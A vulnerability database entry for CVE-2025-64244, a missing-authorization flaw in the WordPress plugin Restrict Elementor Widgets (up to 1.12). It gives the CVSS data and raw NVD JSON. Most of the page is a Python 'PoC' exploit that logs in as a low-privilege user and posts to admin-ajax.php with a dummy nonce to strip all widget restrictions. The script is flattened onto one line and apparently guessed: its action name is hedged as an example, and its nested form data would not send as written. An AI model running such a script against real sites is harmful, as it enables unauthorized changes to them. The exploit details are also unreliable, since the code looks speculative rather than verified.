Security Vulnerability Report
中文
CVE-2025-64244 CVSS 4.3 MEDIUM

CVE-2025-64244

Published: 2025-12-16 09:15:54
Last Modified: 2026-04-27 16:16:37

Description

Missing Authorization vulnerability in Codexpert, Inc Restrict Elementor Widgets, Columns and Sections restrict-elementor-widgets allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Restrict Elementor Widgets, Columns and Sections: from n/a through <= 1.12.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Restrict Elementor Widgets, Columns and Sections <= 1.12 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-64244 PoC - Missing Authorization in Restrict Elementor Widgets Plugin # Target: WordPress site with vulnerable Restrict Elementor Widgets plugin (<= 1.12) def exploit_cve_2025_64244(target_url, username, password): """ Exploit missing authorization vulnerability in Restrict Elementor Widgets plugin. This PoC demonstrates how a low-privileged user can modify access control settings. """ session = requests.Session() # Step 1: Authenticate with low-privilege account login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': target_url, 'testcookie': '1' } session.post(login_url, data=login_data) # Step 2: Exploit missing authorization by sending unauthorized request # Target the plugin's AJAX endpoint that lacks proper capability checks exploit_url = f"{target_url}/wp-admin/admin-ajax.php" # Example payload - modify Elementor widget restrictions exploit_data = { 'action': 'restrict_elementor_save_settings', 'security_nonce': '0000', # Nonce may not be properly validated 'settings': { 'restricted_widgets': [], # Remove all restrictions 'restricted_columns': [], 'restricted_sections': [] } } response = session.post(exploit_url, data=exploit_data) if response.status_code == 200 and 'success' in response.text: print("[+] Exploitation successful - Access control bypassed!") print(f"[+] Response: {response.text}") return True else: print("[-] Exploitation failed or target not vulnerable") return False if __name__ == "__main__": if len(sys.argv) != 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_cve_2025_64244(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64244", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:15:54.037", "lastModified": "2026-04-27T16:16:37.057", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Codexpert, Inc Restrict Elementor Widgets, Columns and Sections restrict-elementor-widgets allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Restrict Elementor Widgets, Columns and Sections: from n/a through <= 1.12."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/restrict-elementor-widgets/vulnerability/wordpress-restrict-elementor-widgets-columns-and-sections-plugin-1-12-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}